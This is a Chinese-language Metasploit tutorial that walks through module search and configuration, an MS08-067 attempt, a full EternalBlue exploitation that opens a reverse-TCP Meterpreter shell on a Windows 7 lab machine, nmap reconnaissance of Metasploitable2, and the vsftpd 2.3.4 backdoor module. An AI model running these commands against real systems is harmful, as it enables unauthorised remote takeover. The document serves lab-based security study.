Metasploit-MSF框架從0到永恒之藍(lán)

本文僅作為學(xué)習(xí)研究，所需用到的靶機(jī)請(qǐng)自行搭建

Metasploit簡(jiǎn)介

Metasploit是一個(gè)滲透測(cè)試平臺(tái)，我們可以查找，利用和驗(yàn)證漏洞，附帶數(shù)千個(gè)已知的軟件漏洞，并保持持續(xù)更新 Metasploit可以用來(lái)信息收集、漏洞探測(cè)、漏洞利用等 滲透測(cè)試的全流程，被安全社區(qū)冠以“可以黑掉整個(gè)宇宙”之名。 剛開始的Metasploit是采用Perl語(yǔ)言編寫的，但是再后 來(lái)的新版中，改成了用Ruby語(yǔ)言編寫的了。

Metasploit體系框架

Metasploitable2-Linux靶機(jī)系統(tǒng)介紹

Metasploitable2虛擬系統(tǒng)是一個(gè)特別制作的ubuntu操作系統(tǒng)，本身設(shè)計(jì)目的是作為安全工具測(cè)試和演示常見(jiàn)漏洞攻擊的環(huán)境。其中最重要的是可以用來(lái)作為MSF攻擊用的靶機(jī)

開放了很多的高危端口如21、23、445等，而且具有很多未打補(bǔ)丁的高危漏洞，如Samba MS-RPC Shell命令注入漏洞等，而且對(duì)外開放了很多服務(wù)，并且數(shù)據(jù)庫(kù)允許外聯(lián)等。系統(tǒng)中的用戶口令均為弱口令。系統(tǒng) 搭載了DVWA、Mutillidae等Web漏洞演練平臺(tái)

默認(rèn)賬號(hào)密碼：msfadmin : msfadmin

Metasploit啟動(dòng)

• 先啟動(dòng)Postgresql數(shù)據(jù)庫(kù)(起到記錄數(shù)據(jù)的作用【信息收集】)
• 直接啟動(dòng)
• 啟動(dòng)Postgresql的同時(shí)啟動(dòng)Metasploit

第一種方式

啟動(dòng)Postgresql數(shù)據(jù)庫(kù)
service postgresql start
停止數(shù)據(jù)庫(kù)服務(wù)
service postgresql stop
啟動(dòng)Metasploit
msfconsole

第二種方式

經(jīng)常用

直接msfconsole

數(shù)據(jù)庫(kù)不啟動(dòng)也不會(huì)報(bào)錯(cuò)，只是信息收集到的信息不會(huì)存儲(chǔ)在數(shù)據(jù)庫(kù)而已

第三種方式

經(jīng)常用

msfdb run
不但啟動(dòng)數(shù)據(jù)庫(kù)，而且一并啟動(dòng)Metasploit框架

查看數(shù)據(jù)庫(kù)有沒(méi)有啟動(dòng)

netstat -panto | grep 5432

Metasploit常見(jiàn)的命令

show

show：用于展示可用模塊

有效參數(shù)是：all，encoders，nops，exploits，payloads，auxiliary，post，plugins，info，options

search

search：我已知一個(gè)漏洞，我想知道Metasploit里面是否有相關(guān)的模塊，就可以使用search進(jìn)行搜索

直接擦護(hù)照search后直接跟要查找內(nèi)容，查找范圍十分廣泛

可以根據(jù)名字、路徑、平臺(tái)、類型、聯(lián)合查詢

模糊查詢

例如

search ms08_

Matching Modules
================#  Name                                                   Disclosure Date  Rank       Check  Description-  ----                                                   ---------------  ----       -----  -----------0  exploit/windows/smb/ms08_067_netapi                    2008-10-28       great      Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption1  exploit/windows/browser/ms08_078_xml_corruption        2008-12-07       normal     No     MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption2  auxiliary/admin/ms/ms08_059_his2006                    2008-10-14       normal     No     Microsoft Host Integration Server 2006 Command Execution Vulnerability3  exploit/windows/browser/ms08_070_visual_studio_msmask  2008-08-13       normal     No     Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow4  exploit/windows/browser/ms08_041_snapshotviewer        2008-07-07       excellent  No     Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download5  exploit/windows/browser/ms08_053_mediaencoder          2008-09-09       normal     No     Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow6  auxiliary/fileformat/multidrop                                          normal     No     Windows SMB Multi DropperInteract with a module by name or index. For example info 6, use 6 or use auxiliary/fileformat/multidrop  

根據(jù)名字搜索

search name:mysql

根據(jù)路徑搜索

search path:mysql

根據(jù)平臺(tái)搜索

search platform:windows

根據(jù)漏洞公布時(shí)間搜索

search date:2023

根據(jù)類型搜索

search type:exploit

根據(jù)rank搜索

search rank:excellent

聯(lián)合查詢

search name:mysql type:exploit rank:excellent

use

use:使用具體某個(gè)模塊

我們以微軟在2008年爆出的ms08_067漏洞為例，該漏洞可能允許遠(yuǎn)程執(zhí)行代碼

先通過(guò)search搜索到漏洞

然后復(fù)制漏洞的路徑

使用use命令指定模塊

use exploit/windows/smb/ms08_067_netapi

進(jìn)入使用模塊

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >

獲取更加詳細(xì)的信息

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >info

       Name: MS08-067 Microsoft Server Service Relative Path Stack CorruptionModule: exploit/windows/smb/ms08_067_netapiPlatform: WindowsArch: Privileged: YesLicense: Metasploit Framework License (BSD)Rank: GreatDisclosed: 2008-10-28Provided by:hdm <x@hdm.io>Brett Moore <brett.moore@insomniasec.com>frank2 <frank2@dc949.org>jduck <jduck@metasploit.com>Available targets:Id  Name--  ----=>  0   Automatic Targeting1   Windows 2000 Universal2   Windows XP SP0/SP1 Universal3   Windows 2003 SP0 Universal4   Windows XP SP2 English (AlwaysOn NX)5   Windows XP SP2 English (NX)6   Windows XP SP3 English (AlwaysOn NX)7   Windows XP SP3 English (NX)8   Windows XP SP2 Arabic (NX)9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)10  Windows XP SP2 Chinese - Simplified (NX)11  Windows XP SP2 Chinese - Traditional (NX)12  Windows XP SP2 Czech (NX)13  Windows XP SP2 Danish (NX)14  Windows XP SP2 German (NX)15  Windows XP SP2 Greek (NX)16  Windows XP SP2 Spanish (NX)17  Windows XP SP2 Finnish (NX)18  Windows XP SP2 French (NX)19  Windows XP SP2 Hebrew (NX)20  Windows XP SP2 Hungarian (NX)21  Windows XP SP2 Italian (NX)22  Windows XP SP2 Japanese (NX)23  Windows XP SP2 Korean (NX)24  Windows XP SP2 Dutch (NX)25  Windows XP SP2 Norwegian (NX)26  Windows XP SP2 Polish (NX)27  Windows XP SP2 Portuguese - Brazilian (NX)28  Windows XP SP2 Portuguese (NX)29  Windows XP SP2 Russian (NX)30  Windows XP SP2 Swedish (NX)31  Windows XP SP2 Turkish (NX)32  Windows XP SP3 Arabic (NX)33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)34  Windows XP SP3 Chinese - Simplified (NX)35  Windows XP SP3 Chinese - Traditional (NX)36  Windows XP SP3 Czech (NX)37  Windows XP SP3 Danish (NX)38  Windows XP SP3 German (NX)39  Windows XP SP3 Greek (NX)40  Windows XP SP3 Spanish (NX)41  Windows XP SP3 Finnish (NX)42  Windows XP SP3 French (NX)43  Windows XP SP3 Hebrew (NX)44  Windows XP SP3 Hungarian (NX)45  Windows XP SP3 Italian (NX)46  Windows XP SP3 Japanese (NX)47  Windows XP SP3 Korean (NX)48  Windows XP SP3 Dutch (NX)49  Windows XP SP3 Norwegian (NX)50  Windows XP SP3 Polish (NX)51  Windows XP SP3 Portuguese - Brazilian (NX)52  Windows XP SP3 Portuguese (NX)53  Windows XP SP3 Russian (NX)54  Windows XP SP3 Swedish (NX)55  Windows XP SP3 Turkish (NX)56  Windows 2003 SP1 English (NO NX)57  Windows 2003 SP1 English (NX)58  Windows 2003 SP1 Japanese (NO NX)59  Windows 2003 SP1 Spanish (NO NX)60  Windows 2003 SP1 Spanish (NX)61  Windows 2003 SP1 French (NO NX)62  Windows 2003 SP1 French (NX)63  Windows 2003 SP2 English (NO NX)64  Windows 2003 SP2 English (NX)65  Windows 2003 SP2 German (NO NX)66  Windows 2003 SP2 German (NX)67  Windows 2003 SP2 Portuguese (NX)68  Windows 2003 SP2 Portuguese - Brazilian (NX)69  Windows 2003 SP2 Spanish (NO NX)70  Windows 2003 SP2 Spanish (NX)71  Windows 2003 SP2 Japanese (NO NX)72  Windows 2003 SP2 French (NO NX)73  Windows 2003 SP2 French (NX)74  Windows 2003 SP2 Chinese - Simplified (NX)75  Windows 2003 SP2 Czech (NX)76  Windows 2003 SP2 Dutch (NX)77  Windows 2003 SP2 Hungarian (NX)78  Windows 2003 SP2 Italian (NX)79  Windows 2003 SP2 Russian (NX)80  Windows 2003 SP2 Swedish (NX)81  Windows 2003 SP2 Turkish (NX)Check supported:YesBasic options:Name     Current Sett  Required  Descriptioning----     ------------  --------  -----------RHOSTS                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    445           yes       The SMB service port (TCP)SMBPIPE  BROWSER       yes       The pipe name touse (BROWSER, SRVSVC)Payload information:Space: 408Avoid: 8 charactersDescription:This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.References:https://nvd.nist.gov/vuln/detail/CVE-2008-4250OSVDB (49243)https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dosView the full module info with the info -d command.

查看所有的參數(shù)

show options

Module options (exploit/windows/smb/ms08_067_netapi):Name     Current Sett  Required  Descriptioning----     ------------  --------  -----------RHOSTS                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    445           yes       The SMB serviceport (TCP)SMBPIPE  BROWSER       yes       The pipe name touse (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name      Current Set  Required  Descriptionting----      -----------  --------  -----------EXITFUNC  thread       yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.11.  yes       The listen addre129                    ss (an interfacemay be specified)LPORT     4444         yes       The listen portExploit target:Id  Name--  ----0   Automatic TargetingView the full module info with the info, or info -d command.

查看必須要添加的參數(shù)

msf6 exploit(windows/smb/ms08_067_netapi) > show missing

Module options (exploit/windows/smb/ms08_067_netapi):Name    Current Sett  Required  Descriptioning----    ------------  --------  -----------RHOSTS                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlPayload options (windows/meterpreter/reverse_tcp):Name  Current Setting  Required  Description----  ---------------  --------  -----------

本處就必須添加PHOSTS

查看payload

msf6 exploit(windows/smb/ms08_067_netapi) > show payloads

查看可以攻擊的目標(biāo)

msf6 exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:
=================Id  Name--  ----
=>  0   Automatic Targeting1   Windows 2000 Universal2   Windows XP SP0/SP1 Universal3   Windows 2003 SP0 Universal4   Windows XP SP2 English (AlwaysOn NX)5   Windows XP SP2 English (NX)6   Windows XP SP3 English (AlwaysOn NX)7   Windows XP SP3 English (NX)8   Windows XP SP2 Arabic (NX)9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)10  Windows XP SP2 Chinese - Simplified (NX)11  Windows XP SP2 Chinese - Traditional (NX)12  Windows XP SP2 Czech (NX)13  Windows XP SP2 Danish (NX)14  Windows XP SP2 German (NX)15  Windows XP SP2 Greek (NX)16  Windows XP SP2 Spanish (NX)17  Windows XP SP2 Finnish (NX)18  Windows XP SP2 French (NX)19  Windows XP SP2 Hebrew (NX)20  Windows XP SP2 Hungarian (NX)21  Windows XP SP2 Italian (NX)22  Windows XP SP2 Japanese (NX)23  Windows XP SP2 Korean (NX)24  Windows XP SP2 Dutch (NX)25  Windows XP SP2 Norwegian (NX)26  Windows XP SP2 Polish (NX)27  Windows XP SP2 Portuguese - Brazilian (NX)28  Windows XP SP2 Portuguese (NX)29  Windows XP SP2 Russian (NX)30  Windows XP SP2 Swedish (NX)31  Windows XP SP2 Turkish (NX)32  Windows XP SP3 Arabic (NX)33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)34  Windows XP SP3 Chinese - Simplified (NX)35  Windows XP SP3 Chinese - Traditional (NX)36  Windows XP SP3 Czech (NX)37  Windows XP SP3 Danish (NX)38  Windows XP SP3 German (NX)39  Windows XP SP3 Greek (NX)40  Windows XP SP3 Spanish (NX)41  Windows XP SP3 Finnish (NX)42  Windows XP SP3 French (NX)43  Windows XP SP3 Hebrew (NX)44  Windows XP SP3 Hungarian (NX)45  Windows XP SP3 Italian (NX)46  Windows XP SP3 Japanese (NX)47  Windows XP SP3 Korean (NX)48  Windows XP SP3 Dutch (NX)49  Windows XP SP3 Norwegian (NX)50  Windows XP SP3 Polish (NX)51  Windows XP SP3 Portuguese - Brazilian (NX)52  Windows XP SP3 Portuguese (NX)53  Windows XP SP3 Russian (NX)54  Windows XP SP3 Swedish (NX)55  Windows XP SP3 Turkish (NX)56  Windows 2003 SP1 English (NO NX)57  Windows 2003 SP1 English (NX)58  Windows 2003 SP1 Japanese (NO NX)59  Windows 2003 SP1 Spanish (NO NX)60  Windows 2003 SP1 Spanish (NX)61  Windows 2003 SP1 French (NO NX)62  Windows 2003 SP1 French (NX)63  Windows 2003 SP2 English (NO NX)64  Windows 2003 SP2 English (NX)65  Windows 2003 SP2 German (NO NX)66  Windows 2003 SP2 German (NX)67  Windows 2003 SP2 Portuguese (NX)68  Windows 2003 SP2 Portuguese - Brazilian (NX)69  Windows 2003 SP2 Spanish (NO NX)70  Windows 2003 SP2 Spanish (NX)71  Windows 2003 SP2 Japanese (NO NX)72  Windows 2003 SP2 French (NO NX)73  Windows 2003 SP2 French (NX)74  Windows 2003 SP2 Chinese - Simplified (NX)75  Windows 2003 SP2 Czech (NX)76  Windows 2003 SP2 Dutch (NX)77  Windows 2003 SP2 Hungarian (NX)78  Windows 2003 SP2 Italian (NX)79  Windows 2003 SP2 Russian (NX)80  Windows 2003 SP2 Swedish (NX)81  Windows 2003 SP2 Turkish (NX)

退出指定的模塊

msf6 exploit(windows/smb/ms08_067_netapi) > back

set

set：用于設(shè)置選項(xiàng)中的參數(shù)

之前我們看到show missing缺失RHOSTS參數(shù)

我們直接將靶機(jī)的IP地址設(shè)置進(jìn)去

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.11.130
RHOSTS => 192.168.11.130

查看設(shè)置是否正確

show options

Module options (exploit/windows/smb/ms08_067_netapi):Name     Current Sett  Required  Descriptioning----     ------------  --------  -----------RHOSTS   192.168.11.1  yes       The target host(30                      s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT    445           yes       The SMB serviceport (TCP)SMBPIPE  BROWSER       yes       The pipe name touse (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name      Current Set  Required  Descriptionting----      -----------  --------  -----------EXITFUNC  thread       yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST     192.168.11.  yes       The listen addre129                    ss (an interfacemay be specified)LPORT     4444         yes       The listen portExploit target:Id  Name--  ----0   Automatic TargetingView the full module info with the info, or info -d command.

可以看到已經(jīng)成功設(shè)置

取消設(shè)置

msf6 exploit(windows/smb/ms08_067_netapi) > unset RHOSTS

exploit/run

exploit/run：執(zhí)行我們準(zhǔn)備的payload

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.11.129:4444 
[*] 192.168.11.130:445 - Automatically detecting the target...
[*] 192.168.11.130:445 - Fingerprint: Unknown -  - lang:Unknown
[-] 192.168.11.130:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.11.129:4444 
[*] 192.168.11.130:445 - Automatically detecting the target...
[*] 192.168.11.130:445 - Fingerprint: Unknown -  - lang:Unknown
[-] 192.168.11.130:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.

exploit和run的區(qū)別

exploit可以添加參數(shù)

后臺(tái)運(yùn)行

msf6 exploit(windows/smb/ms08_067_netapi) > exploit -j

通過(guò)這個(gè)可以保留會(huì)話，以待連接

查看會(huì)話

sessions -l

連接會(huì)話序號(hào)為1的會(huì)話

sessions -i 1

run不能添加參數(shù)

Metasploit攻擊流程

已知漏洞->查找模塊->配置程序->run/exploit

Metasploit小試牛刀

永恒之藍(lán)

簡(jiǎn)介

永恒之藍(lán)概述: 永恒之藍(lán)是指2017年4月14日晚黑客團(tuán)體 Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具，其中包含“永恒之藍(lán)”工具“永恒之藍(lán)”利用 Windows系統(tǒng)的 SMB漏洞可以獲取系統(tǒng)最高權(quán)限。

5月12 日，不法分子通過(guò)改造“永恒之藍(lán)”制作了 wannacry 勒索病毒，英國(guó)、俄羅斯、整個(gè)歐洲以及中國(guó)國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招，被勒索支付高額贖金才能解密恢復(fù)文件

前提準(zhǔn)備

準(zhǔn)備好一個(gè)Win7的靶機(jī)，開放445端口，關(guān)閉防火墻

開放445端口

然后進(jìn)入高級(jí)共享設(shè)置

打開文件和打印機(jī)共享，就已經(jīng)開啟445端口了

信息收集

使用Aux模塊進(jìn)行信息收集

先搜索永恒之藍(lán)對(duì)應(yīng)的ms編號(hào)ms17_010

msf6 > search ms17_010

Matching Modules
================#  Name                                      Disclosure Date  Rank     Check  Description-  ----                                      ---------------  ----     -----  -----------0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE DetectionInteract with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010               

選擇編號(hào)為3的Aux模塊

msf6 > use auxiliary/scanner/smb/smb_ms17_010

查看必選的參數(shù)

msf6 auxiliary(scanner/sm
b/smb_ms17_010) > show missing

Module options (auxiliary/scanner/smb/smb_ms17_010):Name    Current   Required  DescriptiSetting             on----    --------  --------  ---------RHOSTS            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html

發(fā)現(xiàn)只需要填寫RHOSTS

我們set RHOSTS

msf6 auxiliary(scanner/sm
b/smb_ms17_010) > set RHOST 192.168.11.131
RHOST => 192.168.11.131

然后直接run

msf6 auxiliary(scanner/smb/smb_ms17_010) > run   

[+] 192.168.11.135:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.11.135:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/sm

顯示+號(hào)代表成功，發(fā)現(xiàn)永恒之藍(lán)漏洞

我們接下來(lái)使用exploit進(jìn)行漏洞復(fù)現(xiàn)

msf6 > search ms17_010

Matching Modules
================#  Name                                      Disclosure Date  Rank     Check  Description-  ----                                      ---------------  ----     -----  -----------0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE DetectionInteract with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010               

我們這邊選擇0號(hào)進(jìn)行復(fù)現(xiàn)

msf6 > use exploit/windows/smb/ms17_010_eternalblue

同樣查看必填的參數(shù)

msf6 exploit(windows/smb/
ms17_010_eternalblue) > show missing

Module options (exploit/windows/smb/ms17_010_eternalblue):Name    Current   Required  DescriptiSetting             on----    --------  --------  ---------RHOSTS            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlPayload options (windows/x64/meterpreter/reverse_tcp):Name  Current S  Required  Descriptioetting               n----  ---------  --------  ----------

我們set RHOSTS

msf6 exploit(windows/smb/
ms17_010_eternalblue) > set RHOSTS 192.168.11.135
RHOSTS => 192.168.11.135

直接運(yùn)行

msf6 exploit(windows/smb/
ms17_010_eternalblue) > run 

[*] Started reverse TCP handler on 192.168.11.129:4444 
[*] 192.168.11.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.11.135:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.11.135:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.11.135:445 - The target is vulnerable.
[*] 192.168.11.135:445 - Connecting to target for exploitation.
[+] 192.168.11.135:445 - Connection established for exploitation.
[+] 192.168.11.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.11.135:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.11.135:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.11.135:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.11.135:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.11.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.11.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.11.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.11.135:445 - Starting non-paged pool grooming
[+] 192.168.11.135:445 - Sending SMBv2 buffers
[+] 192.168.11.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.11.135:445 - Sending final SMBv2 buffers.
[*] 192.168.11.135:445 - Sending last fragment of exploit packet!
[*] 192.168.11.135:445 - Receiving response from exploit packet
[+] 192.168.11.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.11.135:445 - Sending egg to corrupted connection.
[*] 192.168.11.135:445 - Triggering free of corrupted buffer.
[-] 192.168.11.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.11.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.11.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.11.135:445 - Connecting to target for exploitation.
[+] 192.168.11.135:445 - Connection established for exploitation.
[+] 192.168.11.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.11.135:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.11.135:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.11.135:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.11.135:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.11.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.11.135:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.11.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.11.135:445 - Starting non-paged pool grooming
[+] 192.168.11.135:445 - Sending SMBv2 buffers
[+] 192.168.11.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.11.135:445 - Sending final SMBv2 buffers.
[*] 192.168.11.135:445 - Sending last fragment of exploit packet!
[*] 192.168.11.135:445 - Receiving response from exploit packet
[+] 192.168.11.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.11.135:445 - Sending egg to corrupted connection.
[*] 192.168.11.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.11.135
[*] Meterpreter session 1 opened (192.168.11.129:4444 -> 192.168.11.135:49158) at 2023-08-30 08:39:01 -0400
[+] 192.168.11.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.11.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.11.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

隨便輸入一個(gè)命令

meterpreter > pwd
C:\Windows\system32

成功

PS：本處之所以可以執(zhí)行Linux命令在Windows達(dá)到同樣的效果是因?yàn)镸SF框架對(duì)這些命令進(jìn)行了改進(jìn)，使之可以通用于Windows

退出：exit

Metasploit靶機(jī)信息收集

使用nmap進(jìn)行信息收集

TCP連接掃描

主機(jī)發(fā)現(xiàn)

nmap -sP 192.168.11.0/24

Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 21:36 EDT
Nmap scan report for 192.168.11.1
Host is up (0.000096s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.11.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:EB:D1:3B (VMware)
Nmap scan report for 192.168.11.130
Host is up (0.00015s latency).
MAC Address: 00:0C:29:F6:F2:C4 (VMware)
Nmap scan report for 192.168.11.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:EC:CE:CA (VMware)
Nmap scan report for 192.168.11.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) s

1、2、254是kali的廣播地址

129是kali的IP地址

所以我們的目標(biāo)靶機(jī)地址是130

接下來(lái)對(duì)目標(biāo)靶機(jī)地址進(jìn)行詳細(xì)的信息收集

nmap -sT 192.168.11.130

Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 22:14 EDT
Nmap scan report for 192.168.11.130
Host is up (0.0034s latency).
Not shown: 977 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:F6:F2:C4 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

進(jìn)行版本探測(cè)

nmap -sV 192.168.11.130

Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-30 22:26 EDT
Nmap scan report for 192.168.11.130
Host is up (0.0029s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:F6:F2:C4 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds

PS：補(bǔ)充腳本

該腳本可以對(duì)目標(biāo)主機(jī)或網(wǎng)段掃描是否存在常見(jiàn)的漏洞

nmap --script=vuln 192.168.11.130

進(jìn)行漏洞查詢

我們拿這個(gè)進(jìn)行查詢

21/tcp   open  ftp         vsftpd 2.3.4

直接去CVE漏洞庫(kù)中搜索vsftpd 2.3.4

找到對(duì)應(yīng)的CVE
再到MSF框架中進(jìn)行搜索

很遺憾，我們這邊對(duì)應(yīng)的CVE在MSF中沒(méi)有搜索到

那么我們可以采用在MSF中直接搜索vsftpd

再看看對(duì)應(yīng)的版本正好是2.3.4

我們可以直接進(jìn)行利用

同樣按照之前的操作

use exploit/unix/ftp/vsftpd_234_backdoor
show missing
set RHOSTS 192.168.11.130
run

成功連接

